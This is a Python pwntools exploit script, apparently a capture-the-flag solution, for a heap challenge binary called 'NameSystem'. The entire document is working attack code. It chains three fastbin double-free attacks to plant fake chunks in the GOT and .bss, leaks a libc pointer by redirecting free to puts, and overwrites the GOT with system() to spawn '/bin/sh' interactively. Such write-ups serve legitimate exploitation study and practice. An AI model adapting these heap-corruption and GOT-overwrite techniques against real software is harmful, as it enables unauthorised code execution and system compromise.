# Exploit script for the "NameSystem" heap challenge (x86-64, non-PIE target,
# system glibc). The stages below perform three fastbin-dup attacks and finish
# with a GOT overwrite, so the libc ELF is loaded up front to rebase the leak.
from pwn import *

# Static views of the target and of the libc it is expected to map.
elf = ELF("./NameSystem")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# Live target; every helper below talks to this tube.
p = process("./NameSystem")
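def create(size, content):
    """Menu option 1: allocate a name of ``size`` bytes and fill it with ``content``.

    ``content`` is sent raw via ``sendafter`` (nothing appended), so the caller
    terminates it; every call site in this script ends the payload with b'\\n'.
    Bytes literals are used throughout: under Python 3 pwntools the original
    str/bytes mix (``p64(...) + '\\n'``) raises TypeError, and ``str(size)``
    relied on implicit encoding. Unchanged on Python 2, where bytes is str.
    """
    p.sendlineafter(b'Your choice :', b'1')
    p.sendlineafter(b"Name Size:", str(size).encode())
    p.sendafter(b"Name:", content)


def free(index):
    """Menu option 3: delete the name stored in slot ``index``.

    The exploit relies on this path letting the same chunk be freed twice
    (see the repeated ``free()`` calls on one index below). The bookkeeping
    bug that allows it lives in the binary and is not visible from here.
    """
    p.sendlineafter(b'Your choice :', b'3')
    p.sendlineafter(b"The id you want to delete:", str(index).encode())


# Opening allocations: 18 names of 0x60 bytes (0x70-byte chunks), filling
# the first slots before the fastbin-dup stages that follow.
for _ in range(18):
    create(0x60, b'\n')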
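# --- Stage 1: double free in the 0x60 fastbin, fd poisoned to 0x601ffa -------
# Two 0x50-byte names (0x60-byte chunks) on top of the 18 0x70-byte ones.
for _ in range(2):
    create(0x50, b'\n')
# This delete sequence is what leaves one chunk freeable twice; the counts
# were tuned against the binary's slot handling (note the free(19) after a
# free(0)) and must be replayed in exactly this order.
free(0)
free(19)
for _ in range(17):
    free(0)
free(0)
free(0)

# Debug hook. The original attached gdb unconditionally, which hangs or fails
# outside an interactive terminal; `python exploit.py GDB` restores it.
if args.GDB:
    gdb.attach(p)

# Three allocations drain the dup'd chunks and plant fd = 0x601ffa, so the
# *next* 0x50-byte allocation (made later, for the leak) returns user data at
# 0x60200a. 0x601ffa is presumably chosen because the bytes at 0x602002 —
# inside .got.plt — happen to read as a 0x60 size field; confirm in gdb.
for _ in range(3):
    create(0x50, p64(0x601ffa) + b'\n')

# --- Stage 2: same trick in the 0x70 fastbin, fd poisoned to 0x60208d -------
for _ in range(17):
    create(0x60, b'\n')
free(3)
free(3)
free(19)
for _ in range(13):
    free(3)
free(5)
free(3)
free(3)
# 0x60208d: fake 0x70 chunk whose size byte is again borrowed from existing
# .bss/.got data (presumably the stdout pointer at 0x602080) — verify in gdb.
for _ in range(3):
    create(0x60, p64(0x60208d) + b'\n')

# --- Stage 3: 0x40 fastbin double free; its fd is poisoned after the leak ---
for _ in range(14):
    create(0x30, b'\n')
free(6)
free(6)
free(19)
for _ in range(10):
    free(6)
free(7)
free(6)
free(6)

# --- Leak ---------------------------------------------------------------
# The 0x60208d fake chunk's user data (0x60209d) overlaps the name table:
# after 3 bytes of padding this write sets slot 0 -> 0x602080 (by the look of
# the leak below, the .bss copy of `stdout`) and slot 1 -> 0x60200a.
create(0x60, b'aaa' + p64(0x602080) + p64(0x60200a) + b'\n')
# Fourth 0x50-byte allocation = stage-1 fake chunk, user data at 0x60200a:
# 6 bytes of padding, a fake 0x41 size at 0x602010 (consumed by stage 3 as
# the size of a fake chunk at 0x602008; this also clobbers GOT[2], so every
# import used from here on must already be resolved), then the GOT slot at
# 0x602018 redirected to puts@plt. Only 6 bytes are written so the slot's
# two high zero bytes survive (the binary's read is presumably newline-terminated).
create(0x50, b'aaaaaa' + p64(0x41) + p64(elf.symbols['puts'])[0:6] + b'\n')
# "Deleting" slot 0 now goes through the patched slot and prints the pointer
# stored at 0x602080 — evidently free@got, given that this prints instead of freeing.
free(0)
# recvn() waits for all 6 bytes; recv(6) could legally return fewer.
stdout_ptr = u64(p.recvn(6).ljust(8, b'\x00'))
# Rebase from the symbol table instead of the gdb-derived constant the original
# used (0x7ffff7dd2620 - 0x7ffff7a0d000 = 0x3c5620, which is _IO_2_1_stdout_ on
# Ubuntu 16.04's glibc 2.23); this keeps working when the local libc changes.
libc_base = stdout_ptr - libc.symbols['_IO_2_1_stdout_']
success("libc====>0x%x" % libc_base)
if args.GDB:
    pause()
# system() is used for the final stage; the original also carried an unused
# list of glibc-2.23 one_gadget offsets, dropped here.
system_addr = libc_base + libc.symbols['system']

# --- Stage 3 payoff: write system() into the GOT slot, then call it --------
create(0x30, p64(0x602008) + b'\n')         # poison fd of the dup'd 0x40 chunk
create(0x30, p64(0x602008) + b'\n')
create(0x30, b'/bin/sh\x00' + b'\n')        # ends up in slot 9, per the free(9) below
create(0x30, p64(system_addr)[0:6] + b'\n') # fake chunk at 0x602008 -> writes 0x602018
free(9)                                     # free("/bin/sh") is now system("/bin/sh")
p.interactive()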